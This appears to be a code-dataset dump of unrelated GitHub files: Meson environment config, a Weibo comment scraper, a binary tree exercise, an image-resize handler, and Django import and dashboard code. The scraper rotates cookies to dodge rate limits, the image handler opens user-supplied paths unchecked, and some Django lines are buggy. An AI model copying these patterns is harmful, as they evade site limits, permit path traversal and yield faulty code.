{'cpu', 'cpu_family', 'endian', 'system'}\n if set(literal) < minimum_literal:\n raise EnvironmentException(\n 'Machine info is currently {}\\n'.format(literal) +\n 'but is missing {}.'.format(minimum_literal - set(literal)))\n\n cpu_family = literal['cpu_family']\n if cpu_family not in known_cpu_families:\n mlog.warning('Unknown CPU family {}, please report this at https://github.com/mesonbuild/meson/issues/new'.format(cpu_family))\n\n endian = literal['endian']\n if endian not in ('little', 'big'):\n mlog.warning('Unknown endian {}'.format(endian))\n\n return cls(literal['system'], cpu_family, literal['cpu'], endian)\n\n def is_windows(self) -> bool:\n \"\"\"\n Machine is windows?\n \"\"\"\n return self.system == 'windows' or 'mingw' in self.system\n\n def is_cygwin(self) -> bool:\n \"\"\"\n Machine is cygwin?\n \"\"\"\n return self.system.startswith('cygwin')\n\n def is_linux(self) -> bool:\n \"\"\"\n Machine is linux?\n \"\"\"\n return self.system == 'linux'\n\n def is_darwin(self) -> bool:\n \"\"\"\n Machine is Darwin (iOS/tvOS/OS X)?\n \"\"\"\n return self.system in {'darwin', 'ios', 'tvos'}\n\n def is_android(self) -> bool:\n \"\"\"\n Machine is Android?\n \"\"\"\n return self.system == 'android'\n\n def is_haiku(self) -> bool:\n \"\"\"\n Machine is Haiku?\n \"\"\"\n return self.system == 'haiku'\n\n def is_netbsd(self) -> bool:\n \"\"\"\n Machine is NetBSD?\n \"\"\"\n return self.system == 'netbsd'\n\n def is_openbsd(self) -> bool:\n \"\"\"\n Machine is OpenBSD?\n \"\"\"\n return self.system == 'openbsd'\n\n def is_dragonflybsd(self) -> bool:\n \"\"\"Machine is DragonflyBSD?\"\"\"\n return self.system == 'dragonfly'\n\n def is_freebsd(self) -> bool:\n \"\"\"Machine is FreeBSD?\"\"\"\n return self.system == 'freebsd'\n\n def is_sunos(self) -> bool:\n \"\"\"Machine is illumos or Solaris?\"\"\"\n return self.system == 'sunos'\n\n def is_hurd(self) -> bool:\n \"\"\"\n Machine is GNU/Hurd?\n \"\"\"\n return self.system == 'gnu'\n\n def is_irix(self) -> bool:\n \"\"\"Machine is IRIX?\"\"\"\n return self.system.startswith('irix')\n\n # Various prefixes and suffixes for import libraries, shared libraries,\n # static libraries, and executables.\n # Versioning is added to these names in the backends as-needed.\n def get_exe_suffix(self) -> str:\n if self.is_windows() or self.is_cygwin():\n return 'exe'\n else:\n return ''\n\n def get_object_suffix(self) -> str:\n if self.is_windows():\n return 'obj'\n else:\n return 'o'\n\n def libdir_layout_is_win(self) -> bool:\n return self.is_windows() or self.is_cygwin()\n\nclass BinaryTable:\n def __init__(\n self,\n binaries: T.Optional[T.Dict[str, T.Union[str, T.List[str]]]] = None,\n ):\n self.binaries = binaries or {} # type: T.Dict[str, T.Union[str, T.List[str]]]\n for name, command in self.binaries.items():\n if not isinstance(command, (list, str)):\n # TODO generalize message\n raise mesonlib.MesonException(\n 'Invalid type {!r} for binary {!r} in cross file'\n ''.format(command, name))\n\n # Map from language identifiers to environment variables.\n evarMap = {\n # Compilers\n 'c': 'CC',\n 'cpp': 'CXX',\n 'cs': 'CSC',\n 'd': 'DC',\n 'fortran': 'FC',\n 'objc': 'OBJC',\n 'objcpp': 'OBJCXX',\n 'rust': 'RUSTC',\n 'vala': 'VALAC',\n\n # Linkers\n 'c_ld': 'CC_LD',\n 'cpp_ld': 'CXX_LD',\n 'd_ld': 'DC_LD',\n 'fortran_ld': 'FC_LD',\n 'objc_ld': 'OBJC_LD',\n 'objcpp_ld': 'OBJCXX_LD',\n 'rust_ld': 'RUSTC_LD',\n\n # Binutils\n 'strip': 'STRIP',\n 'ar': 'AR',\n 'windres': 'WINDRES',\n\n # Other tools\n 'cmake': 'CMAKE',\n 'qmake': 'QMAKE',\n 'pkgconfig': 'PKG_CONFIG',\n } # type: T.Dict[str, str]\n\n # Deprecated environment variables mapped from the new variable to the old one\n # Deprecated in 0.54.0\n DEPRECATION_MAP = {\n 'DC_LD': 'D_LD',\n 'FC_LD': 'F_LD',\n 'RUSTC_LD': 'RUST_LD',\n 'OBJCXX_LD': 'OBJCPP_LD',\n } # type: T.Dict[str, str]\n\n @staticmethod\n def detect_ccache() -> T.List[str]:\n try:\n subprocess.check_call(['ccache', '--version'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n except (OSError, subprocess.CalledProcessError):\n return []\n return ['ccache']\n\n @classmethod\n def parse_entry(cls, entry: T.Union[str, T.List[str]]) -> T.Tuple[T.List[str], T.List[str]]:\n compiler = mesonlib.stringlistify(entry)\n # Ensure ccache exists and remove it if it doesn't\n if compiler[0] == 'ccache':\n compiler = compiler[1:]\n ccache = cls.detect_ccache()\n else:\n ccache = []\n # Return value has to be a list of compiler 'choices'\n return compiler, ccache\n\n def lookup_entry(self,\n for_machine: MachineChoice,\n is_cross: bool,\n name: str) -> T.Optional[T.List[str]]:\n \"\"\"Lookup binary in cross/native file and fallback to environment.\n\n Returns command with args as list if found, Returns `None` if nothing is\n found.\n \"\"\"\n # Try explicit map, don't fall back on env var\n # Try explict map, then env vars\n for _ in [()]: # a trick to get `break`\n raw_command = self.binaries.get(name)\n if raw_command is not None:\n command = mesonlib.stringlistify(raw_command)\n break # found\n evar = self.evarMap.get(name)\n if evar is not None:\n raw_command = get_env_var(for_machine, is_cross, evar)\n if raw_command is None:\n deprecated = self.DEPRECATION_MAP.get(evar)\n if deprecated is not None:\n raw_command = get_env_var(for_machine, is_cross, deprecated)\n if raw_command is not None:\n mlog.deprecation(\n 'The', deprecated, 'environment variable is deprecated in favor of',\n evar, once=True)\n if raw_command is not None:\n command = split_args(raw_command)\n break # found\n command = None\n\n\n # Do not return empty or blank string entries\n if command is not None and (len(command) == 0 or len(command[0].strip()) == 0):\n command = None\n return command\n\nclass Directories:\n\n \"\"\"Data class that holds information about directories for native and cross\n builds.\n \"\"\"\n\n def __init__(self, bindir: T.Optional[str] = None, datadir: T.Optional[str] = None,\n includedir: T.Optional[str] = None, infodir: T.Optional[str] = None,\n libdir: T.Optional[str] = None, libexecdir: T.Optional[str] = None,\n localedir: T.Optional[str] = None, localstatedir: T.Optional[str] = None,\n mandir: T.Optional[str] = None, prefix: T.Optional[str] = None,\n sbindir: T.Optional[str] = None, sharedstatedir: T.Optional[str] = None,\n sysconfdir: T.Optional[str] = None):\n self.bindir = bindir\n self.datadir = datadir\n self.includedir = includedir\n self.infodir = infodir\n self.libdir = libdir\n self.libexecdir = libexecdir\n self.localedir = localedir\n self.localstatedir = localstatedir\n self.mandir = mandir\n self.prefix = prefix\n self.sbindir = sbindir\n self.sharedstatedir = sharedstatedir\n self.sysconfdir = sysconfdir\n\n def __contains__(self, key: str) -> bool:\n return hasattr(self, key)\n\n def __getitem__(self, key: str) -> T.Optional[str]:\n # Mypy can't figure out what to do with getattr here, so we'll case for it\n return T.cast(T.Optional[str], getattr(self, key))\n\n def __setitem__(self, key: str, value: T.Optional[str]) -> None:\n setattr(self, key, value)\n\n def __iter__(self) -> T.Iterator[T.Tuple[str, str]]:\n return iter(self.__dict__.items())\n","repo_name":"SoftwareGuy/stealthChamp-qemu","sub_path":"meson/mesonbuild/envconfig.py","file_name":"envconfig.py","file_ext":"py","file_size_in_byte":14287,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"7"}
+{"seq_id":"13155075701","text":"\"\"\"最终版2018/11/27(修改了只能爬最新的 不能爬'昨天'的评论内容 测试表示微博限制单个用户访问频次较严重 本次添加了五个Cookie)\"\"\"\r\nimport requests\r\nimport json\r\nimport re\r\nimport ceshi.cookies as ck\r\nimport random\r\nimport aiohttp\r\nimport asyncio\r\nclass Wb_Comment:\r\n def __init__(self,url):\r\n self.headers = {\r\n 'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Mobile Safari/537.36',\r\n 'Cookie':random.choice(ck.cookies)\r\n }\r\n self.url = url\r\n self.comment_list = []\r\n p1 = re.compile(r'.*/(.*)', re.S)\r\n cuturl = re.findall(p1, self.url)\r\n self.mid = cuturl[0]\r\n def get_frist(self):\r\n url = 'https://m.weibo.cn/comments/hotflow?id={0}&mid={0}&max_id_type=0'.format(self.mid)\r\n response = requests.get(url,headers=self.headers).text\r\n html = json.loads(response)\r\n items = html['data']['data']\r\n for item in items:\r\n ID = item['id']\r\n Name = item['user']['screen_name']\r\n Content = item['text']\r\n Agree = item['like_count']\r\n Time = item['created_at']\r\n self.comment_list.append({'ID': ID, 'Name': Name, 'Content': Content,'Agree':Agree, 'Time': Time})\r\n next_id = html['data']['max_id']\r\n return next_id\r\n async def get_next(self):\r\n maxid = self.get_frist()\r\n while 1:\r\n url = 'https://m.weibo.cn/comments/hotflow?id={0}&mid={0}&max_id={1}&max_id_type=0'.format(self.mid,maxid)\r\n async with aiohttp.ClientSession() as session:\r\n async with session.get(url,headers=self.headers) as pagehtml:\r\n response = await pagehtml.text(\"utf-8\", \"ignore\")\r\n html = json.loads(response)\r\n items = html['data']['data']\r\n for item in items:\r\n ID = item['id']\r\n Name = item['user']['screen_name']\r\n Content = item['text']\r\n Agree = item['like_count']\r\n Time = item['created_at']\r\n timeArray = datetime.datetime.strptime(Time, '%a %b %d %H:%M:%S +0800 %Y')\r\n otherStyleTime = timeArray.strftime(\r\n '%Y/%m/%d %H:%M:%S') # 评论时间 Tue Nov 20 12:39:24 +0800 2018 转为 2018/11/20 12:39:24 格式\r\n self.comment_list.append({'ID': ID, 'Name': Name, 'Content': Content, 'Agree': Agree, 'Time': otherStyleTime})\r\n maxid = html['data']['max_id']\r\n if maxid == 0:\r\n break\r\n def main(self):\r\n asyncio.set_event_loop(asyncio.new_event_loop())\r\n loop = asyncio.get_event_loop()\r\n loop.run_until_complete(self.get_next())\r\n loop.close()\r\n # wb_commment_dict = {'最新评论': len(self.comment_list)}\r\n wb_commment_dict = {'最新评论': self.comment_list,'type': 'weibo'}\r\n # print(wb_commment_dict)\r\n return wb_commment_dict\r\n\r\n\r\n","repo_name":"mango941231/Python-webspider","sub_path":"Crawl_WB_Commentasyncio.py","file_name":"Crawl_WB_Commentasyncio.py","file_ext":"py","file_size_in_byte":3195,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"16377991600","text":"class Node:\n def __init__(self, value, left, right):\n self.value = value\n self.left = left\n self.right = right\n\n\nclass BinaryTree:\n def __init__(self, array):\n node_list = [Node(value, None, None) for value in array]\n for ind, node in enumerate(node_list):\n left = 2 * ind + 1\n right = 2 * ind + 2\n if left < len(node_list):\n node.left = node_list[left]\n if right < len(node_list):\n node.right = node_list[right]\n\n self.root = node_list[0]\n\n def preorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n s += str(node.value) + ' '\n if node.left:\n recursive(node.left)\n if node.right:\n recursive(node.right)\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n \n def inorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n if node.left:\n recursive(node.left)\n s += str(node.value) + ' '\n if node.right:\n recursive(node.right)\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n \n def postorder(self):\n s = ''\n def recursive(node):\n nonlocal s\n if node.left:\n recursive(node.left)\n if node.right:\n recursive(node.right)\n s += str(node.value) + ' '\n\n s = '['\n recursive(self.root)\n s += ']'\n print(s)\n\n def bfs(self, value):\n queue = []\n isFound = False\n queue.append(self.root)\n\n while queue:\n node = queue[0]\n del queue[0]\n if node.value == value:\n isFound = True\n return isFound\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n return isFound\n \n def dfs(self, value):\n isFound = False\n def recursive(node):\n nonlocal isFound\n if node.value == value:\n isFound = True\n return\n if isFound is True:\n return\n if node.left is not None:\n recursive(node.left)\n if node.right is not None:\n recursive(node.right)\n \n recursive(self.root)\n return isFound\n\n\ntree = BinaryTree([i for i in range(13)])\ntree.preorder()\ntree.inorder()\ntree.postorder()\n\nprint(tree.dfs(4))\nprint(tree.dfs(11))\n\nprint(tree.bfs(6))\nprint(tree.bfs(17))","repo_name":"hodduck-v/algorithm_nklcb1","sub_path":"0326/binary_tree_node.py","file_name":"binary_tree_node.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"12460095273","text":"from PIL import Image\nfrom cStringIO import StringIO\nimport os\n\nos.chdir(os.path.dirname(__file__))\n\ndef index(req,image,**opts):\n\tdir = './'\n\n\ts = StringIO()\n\ttypes = ['gif','jpg','png']\n\n\t# Open image\n\timg = Image.open(dir+image);\n\n\t# Default size \n\tsize = list(img.size)\n\n\tif opts.has_key('width'):\n\t\tsize[0] = int(opts['width'])\n\tif opts.has_key('height'):\n\t\tsize[1] = int(opts['height'])\n\n\tsize = tuple(size)\n\t# Scale image \n\tif size != img.size:\n\t\timg.thumbnail(size,Image.ANTIALIAS)\n\n\tformat = img.format\n\tif opts.has_key('format') and opts['format'] in types:\n\t\tformat = opts['format']\n\n\tif format == 'jpg':\n\t\tformat = 'jpeg'\n\n\timg.save(s,format)\n\n\treq.content_type = 'image/'+format\n\timg = s.getvalue()\n\ts.close()\n\treturn img\n","repo_name":"Joshua2504/regnum-maps-old","sub_path":"beta/images/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"40201893059","text":"# -*- coding: utf-8 -*-\n\nimport collections\n\nfrom copy import deepcopy\n\n\ndef _get_deep_attr(obj, attr):\n for path in attr.split(\".\"):\n try:\n obj = getattr(obj, path)\n except AttributeError: \n return None\n return obj\n\ndef json_transform(obj, attrs_tree, extend=None):\n result = {}\n for attr in attrs_tree:\n _attr = attr.split(\"-\")[0]\n val = attrs_tree[attr]\n \n if isinstance(val, dict): # val is a map\n objarray = getattr(obj, _attr)\n val = deepcopy(val)\n sort_key = val.pop(\"$_sort_key_$\") if \"$_sort_key_$\" in val else None\n filter_funct = val.pop(\"$filter$\") if \"$filter$\" in val else (lambda e: True)\n result[attr] = list()\n if sort_key: \n objarray = sorted(objarray, key=sort_key) \n for item in objarray:\n if filter_funct(item): result[attr].append(json_transform(item, attrs_tree=val))\n \n elif isinstance(val, (list, tuple)): # val is list\n columns = val\n objarray = getattr(obj, _attr)\n \n result[attr] = {}\n result[attr][\"$RECORDS$\"] = []\n \n functs, formats, list_attrs, _columns = [], [], [], []\n for col in columns: \n list_attrs.append(col[\"$attr\"])\n formats.append(col[\"$format\"] if \"$format\" in col else None)\n functs.append(col[\"$funct\"] if \"$funct\" in col else None)\n _columns.append(dict([ (k, col[k]) for k in col if k != '$funct']))\n \n for item in objarray:\n row = []\n for idx, col in enumerate(columns):\n l_attr = list_attrs[idx]\n funct = functs[idx]\n fmat = formats[idx]\n raw_value = _get_deep_attr(item, l_attr)\n value = funct(raw_value) if (funct is not None) else (fmat % (raw_value,) if raw_value is not None else \"\") if (fmat is not None) else raw_value\n row.append(value)\n result[attr][\"$RECORDS$\"].append(row)\n \n result[attr][\"$COLUMNS$\"] = _columns\n elif callable(val):\n funct = val\n field_value = funct( _get_deep_attr(obj, _attr) )\n result[attr] = field_value \n else:\n fmat = attrs_tree[attr]\n field_value = _get_deep_attr(obj, _attr)\n result[attr] = field_value if fmat is None else (fmat %(field_value, ) if (field_value is not None) else None)\n if extend:\n result.update(extend)\n return result\n","repo_name":"rotoudjimaye/web-analytics","sub_path":"src/main/webapp/WEB-INF/jython-app/webanalytics/json_transforms.py","file_name":"json_transforms.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
+{"seq_id":"7582189099","text":"\"\"\"\nImport json data from JSON file to Datababse\n\"\"\"\nimport os\nimport json\nfrom gogoedu.models import Catagory,Lesson,Word\nfrom django.core.management import BaseCommand\nfrom elearning.settings import BASE_DIR\n\n\nclass Command(BaseCommand):\n def import_vocab_from_file(self):\n data_folder = os.path.join(BASE_DIR, 'gogoedu', 'static/json_file/vocab')\n for data_file in os.listdir(data_folder):\n with open(os.path.join(data_folder, data_file), encoding='utf-8') as data_file:\n data = json.loads(data_file.read())\n catagory,createdCatagory=Catagory.objects.get_or_create(name=\"Kanji Genki\")\n for data_object in data:\n kana = data_object.get('Kana', None)\n kanji = data_object.get('Kanji', None)\n lesson = data_object.get('Lesson', None)\n mean = data_object.get('Meaning', None)\n try:\n lesson, created_lesson = Lesson.objects.get_or_create(\n name = lesson,\n catagory = catagory,\n )\n if created_lesson:\n lesson.save()\n display_format = \"\\nLesson, {}, has been saved.\"\n print(display_format.format(lesson))\n word, created_word = Word.objects.get_or_create(\n word=kana,\n mean=mean,\n kanji=kanji,\n catagory=catagory,\n )\n word.lesson.add(lesson)\n if created_word:\n word.save()\n display_format = \"\\nWord, {}, has been saved.\"\n print(display_format.format(word))\n except Exception as ex:\n print(str(ex))\n msg = \"\\n\\nSomething went wrong saving this Word: {}\\n{}\".format(kana, str(ex))\n print(msg)\n \n\n\n def handle(self, *args, **options):\n \"\"\"\n Call the function to import data\n \"\"\"\n self.import_vocab_from_file()","repo_name":"tuandang98/gogoedu","sub_path":"gogoedu/management/commands/import_vocab_from_json_file.py","file_name":"import_vocab_from_json_file.py","file_ext":"py","file_size_in_byte":2292,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"11850646185","text":"import decimal\nfrom datetime import datetime\n\nfrom django.db.models import Sum, F, Value, ExpressionWrapper, Q, Subquery, OuterRef, FloatField\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom django.views.generic import UpdateView, ListView, View\nfrom directory.models import PaymentAccount, CurrenciesRates, Counterparties, InitialDebts, Currencies\nfrom payments.models import PaymentDocuments\n\nfrom registers.forms import AccountSettingsSet, AccountBalancesFilter, DashboardFilter\nfrom registers.models import AccountSettings\nfrom registers.views_reports import AccountBalancesView\n\n\ndef htmx_projects(request):\n form = DashboardFilter(request.GET)\n return HttpResponse(form[\"project\"])\n\n\nclass DashboardView(View):\n def get(self, request):\n main_currency = AccountSettings.load().currency()\n form = DashboardFilter(request.GET)\n accounts = PaymentAccount.objects.all()\n\n paydocs = PaymentDocuments.objects.all().annotate(amount_convert=F('inflow_amount')+F('outflow_amount'))\n #paydocs = []\n rates = {main_currency.id: decimal.Decimal(1)}\n for doc in paydocs:\n if doc.currency_id not in rates:\n rates[doc.currency_id] = (\n CurrenciesRates.objects.filter(\n accounting_currency=main_currency,\n currency=F('currency__id'),\n date__lte=datetime.now(),\n ).order_by('-date')[:1].first().rate\n )\n # doc.amount_convert=(doc.inflow_amount + doc.outflow_amount) / rates[doc.currency_id]\n doc.amount_convert /= rates[doc.currency_id]\n\n print(doc.date, doc.inflow_amount, doc.outflow_amount, doc.currency, doc.amount_convert)\n\n paydocs_before = paydocs\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n accounts = accounts.filter(organization=form.cleaned_data['organization'])\n paydocs = paydocs.filter(organization=form.cleaned_data['organization'])\n paydocs_before = paydocs_before.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['date_start']:\n paydocs = paydocs.filter(date__gte=form.cleaned_data['date_start'])\n if form.cleaned_data['date_end']:\n paydocs = paydocs.filter(date__lte=form.cleaned_data['date_end'])\n paydocs_before = paydocs_before.filter(date__lte=form.cleaned_data['date_start'])\n\n cf_table, cf_bar = self.get_cf_table(paydocs)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'main_currency': main_currency,\n 'account_balances': self.get_balances(accounts, paydocs_before),\n 'cf_table': cf_table,\n 'cf_bar': cf_bar,\n 'cf_dynamics': self.get_cf_dynamics(paydocs),\n }\n\n return render(request, 'registers/dashboard.html', context=context)\n\n # chart 1: account balances\n @staticmethod\n def get_balances(accounts, paydocs_before):\n account_balances = {}\n accounts = accounts.values_list('account', flat=True).distinct()\n\n for acc in accounts:\n currency = PaymentAccount.objects.filter(account=acc).values_list('currency__code', flat=True)[0]\n\n receipts = paydocs_before.filter(account__account=acc)\n receipts_sum = receipts.aggregate(Sum(\"inflow_amount\")).get('inflow_amount__sum', 0.00)\n if receipts_sum is None:\n receipts_sum = 0\n\n payments = paydocs_before.filter(account__account=acc)\n payments_sum = payments.aggregate(Sum(\"outflow_amount\")).get('outflow_amount__sum', 0.00)\n if payments_sum is None:\n payments_sum = 0\n\n final_balance = receipts_sum - payments_sum\n account_balances[acc] = [int(final_balance), currency]\n\n account_balances = [[k, *v] for k, v in account_balances.items()]\n\n return account_balances\n\n @staticmethod\n def get_amount_sum(paydocs):\n amount_sum = paydocs.aggregate(Sum(\"amount_convert\")).get('amount_convert__sum', 0.00)\n if amount_sum is None:\n amount_sum = 0\n return amount_sum\n\n # chart 2, 3 cf table and cf bar\n def get_cf_table(self, paydocs):\n cf_table = {}\n\n receipts_total = paydocs.filter(flow='Receipts')\n payments_total = paydocs.filter(flow='Payments')\n receipts_oper = paydocs.filter(item__activity='operating', flow='Receipts')\n payments_oper = paydocs.filter(item__activity='operating', flow='Payments')\n receipts_invest = paydocs.filter(item__activity='investing', flow='Receipts')\n payments_invest = paydocs.filter(item__activity='investing', flow='Payments')\n receipts_fin = paydocs.filter(item__activity='financing', flow='Receipts')\n payments_fin = paydocs.filter(item__activity='financing', flow='Payments')\n\n receipts_sum = self.get_amount_sum(receipts_total)\n payments_sum = self.get_amount_sum(payments_total)\n receipts_oper_sum = self.get_amount_sum(receipts_oper)\n payments_oper_sum = self.get_amount_sum(payments_oper)\n receipts_invest_sum = self.get_amount_sum(receipts_invest)\n payments_invest_sum = self.get_amount_sum(payments_invest)\n receipts_fin_sum = self.get_amount_sum(receipts_fin)\n payments_fin_sum = self.get_amount_sum(payments_fin)\n\n cf = receipts_sum - payments_sum\n cf_oper = receipts_oper_sum - payments_oper_sum\n cf_invest = receipts_invest_sum - payments_invest_sum\n cf_fin = receipts_fin_sum - payments_fin_sum\n\n cf_table['receipts'] = [int(receipts_oper_sum), int(receipts_invest_sum), int(receipts_fin_sum),\n int(receipts_sum)]\n cf_table['payments'] = [int(payments_oper_sum), int(payments_invest_sum), int(payments_fin_sum),\n int(payments_sum)]\n cf_table['cash flow'] = [int(cf_oper), int(cf_invest), int(cf_fin), int(cf)]\n\n cf_table = [[k, *v] for k, v in cf_table.items()]\n\n cf_total = cf_table[2][1] + cf_table[2][2] + cf_table[2][3]\n\n cf_bar = [['Operating', cf_table[2][1]], ['Investment', cf_table[2][2]],\n ['Financing', cf_table[2][3]], ['Total', cf_total]]\n\n return cf_table, cf_bar\n\n # function for getting full data\n @staticmethod\n def get_dynamics(paydocs):\n dynamics = {}\n for paydoc in paydocs:\n month = str(paydoc.date.month).rjust(2, '0')\n period = f'{str(paydoc.date.year)}/{month}'\n amount = float(paydoc.amount_convert)\n if period not in dynamics:\n dynamics[period] = amount\n else:\n dynamics[period] += amount\n\n return dynamics\n\n # get dynamics of receipts and payments\n def get_cf_dynamics(self, paydocs):\n payments = paydocs.filter(flow='Payments')\n receipts = paydocs.filter(flow='Receipts')\n receipts_dynamics = self.get_dynamics(receipts)\n for k, v in receipts_dynamics.items():\n receipts_dynamics[k] = int(v)\n payments_dynamics = self.get_dynamics(payments)\n for k, v in payments_dynamics.items():\n payments_dynamics[k] = int(v * (-1))\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n cf_dynamics = []\n for k, v in total_cf.items():\n cf_dynamics.append([k, *v, v[0] + v[1]])\n\n return cf_dynamics\n\n\nclass ChartsOperView(View):\n def get(self, request):\n main_currency = AccountSettings.load().currency()\n form = DashboardFilter(request.GET)\n receipts = PaymentDocuments.objects.filter(flow='Receipts', item__activity='operating')\n payments = PaymentDocuments.objects.filter(flow='Payments', item__activity='operating')\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n receipts = receipts.filter(organization=form.cleaned_data['organization'])\n payments = payments.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['project']:\n receipts = receipts.filter(project=form.cleaned_data['project'])\n payments = payments.filter(project=form.cleaned_data['project'])\n if form.cleaned_data['date_start']:\n receipts = receipts.filter(date__gte=form.cleaned_data['date_start'])\n payments = payments.filter(date__gte=form.cleaned_data['date_start'])\n if form.cleaned_data['date_end']:\n receipts = receipts.filter(date__lte=form.cleaned_data['date_end'])\n payments = payments.filter(date__lte=form.cleaned_data['date_end'])\n\n rp_dynamics = self.get_rp_dynamics(receipts, payments)\n\n context = {\n 'form': form,\n 'today': datetime.today(),\n 'main_currency': main_currency,\n 'payments_bar': self.get_bar_payments(payments),\n 'receipts_structure': self.get_structure(receipts),\n 'payments_structure': self.get_structure(payments),\n 'rp_dynamics': rp_dynamics,\n 'top_customers': self.get_bar_top10(receipts, 'Receipts'),\n 'top_suppliers': self.get_bar_top10(payments, 'Payments'),\n }\n\n return render(request, 'registers/charts_oper.html', context=context)\n\n # charts 1, 2, 4\n def get_structure(self, doc):\n main_currency = AccountSettings.load().currency()\n data = {}\n for i in doc:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n item = str(i.item)\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n\n if item not in data:\n data[item] = int(amount)\n else:\n data[item] += int(amount)\n\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n data_sort = dict(data_sort)\n structure = [[k, v] for k, v in data_sort.items()]\n\n return structure\n\n # function for data payments and payments\n @staticmethod\n def get_dynamics(doc):\n main_currency = AccountSettings.load().currency()\n dynamics = {}\n for i in doc:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n month = str(i.date.month).rjust(2, '0')\n period = f'{str(i.date.year)}/{month}'\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n if period not in dynamics:\n dynamics[period] = int(amount)\n else:\n dynamics[period] += int(amount)\n\n return dynamics\n\n # get data payments and payments for chart 3\n def get_total_cf(self, receipts, payments):\n payments_dynamics = self.get_dynamics(payments)\n receipts_dynamics = self.get_dynamics(receipts)\n\n total_cf = {k: [receipts_dynamics.get(k, 0), payments_dynamics.get(k, 0)]\n for k in set(receipts_dynamics) | set(payments_dynamics)}\n total_cf = sorted(total_cf.items(), key=lambda x: x[0])\n total_cf = dict(total_cf)\n\n return total_cf\n\n # chart 3 Dynamics of payments and payments\n def get_rp_dynamics(self, receipts, payments):\n total_cf = self.get_total_cf(receipts, payments)\n rp_dynamics = []\n for k, v in total_cf.items():\n rp_dynamics.append([k, *v])\n\n return rp_dynamics\n\n # chart 5 Payments bar by group\n @staticmethod\n def get_bar_payments(paydocs):\n main_currency = AccountSettings.load().currency()\n data = {}\n for i in paydocs:\n rate = float(AccountBalancesView.get_rate(i.currency, main_currency))\n items_group = str(i.item.group)\n amount = float(i.inflow_amount) / rate if i.inflow_amount != 0 else float(i.outflow_amount) / rate\n if items_group not in data:\n data[items_group] = amount\n else:\n data[items_group] += amount\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n structure = dict(data_sort)\n\n return [[k, v] for k, v in structure.items()]\n\n # chart 6, 7 TOP-10 counterparty\n @staticmethod\n def get_bar_top10(paydocs, flow):\n main_currency = AccountSettings.load().currency()\n if flow == 'Receipts':\n counterparties = Counterparties.objects.filter(customer=True).values_list('id', flat=True)\n else:\n counterparties = Counterparties.objects.filter(suppliers=True).values_list('id', flat=True)\n data = {}\n paydocs_sum = (\n paydocs\n .filter(counterparty__in=counterparties)\n .annotate(amount_sum=Sum(\"inflow_amount\") + Sum(\"outflow_amount\"))\n .order_by('counterparty', 'currency', 'amount_sum')\n .values('counterparty__counterparty', 'currency', 'amount_sum')\n )\n counterparty = None\n for doc_sum in paydocs_sum:\n cp = doc_sum['counterparty__counterparty']\n if counterparty != cp:\n counterparty = cp\n data[cp] = 0.0\n rate = AccountBalancesView.get_rate(doc_sum['currency'], main_currency)\n data[cp] += int(float(doc_sum['amount_sum']) / (float(rate) or 1.0))\n\n data_sort = sorted(data.items(), key=lambda x: x[1], reverse=True)\n top10 = dict(data_sort)\n\n return [[k, v] for k, v in top10.items()][:10]\n\n\nclass ChartsFinView(View):\n main_currency = AccountSettings.load().currency()\n\n def get(self, request):\n form = DashboardFilter(request.GET)\n currencies = Currencies.objects.all()\n agents = Counterparties.objects.all()\n initial_debts = InitialDebts.objects.all()\n paydocs = PaymentDocuments.objects.filter(item__activity='financing') \\\n .annotate(amount=F('inflow_amount') + F('outflow_amount'),\n rate=Value(AccountBalancesView.get_rate(F('currecy__id'), self.main_currency)),\n amount_convert=(F('amount') / F('rate')))\n\n # for i in paydocs:\n # print(i.date, i.currency, i.rate, i.amount_convert)\n\n paydocs_before = paydocs\n\n if form.is_valid():\n if form.cleaned_data['organization']:\n paydocs = paydocs.filter(organization=form.cleaned_data['organization'])\n paydocs_before = paydocs_before.filter(organization=form.cleaned_data['organization'])\n initial_debts = initial_debts.filter(organization=form.cleaned_data['organization'])\n if form.cleaned_data['date_start']:\n paydocs = paydocs.filter(date__gte=form.cleaned_data['date_start'])\n paydocs_before = paydocs_before.filter(date__gte=form.cleaned_data['date_start'])\n else:\n paydocs_before = PaymentDocuments.objects.none()\n if form.cleaned_data['date_end']:\n paydocs = paydocs.filter(date__lte=form.cleaned_data['date_end'])\n paydocs_before = paydocs_before.filter(date__lte=form.cleaned_data['date_end'])\n\n # credit_portfolio = self.get_loan_portfolio(agents, paydocs, initial_debts)\n # debit_portfolio = self.get_loan_portfolio(agents, 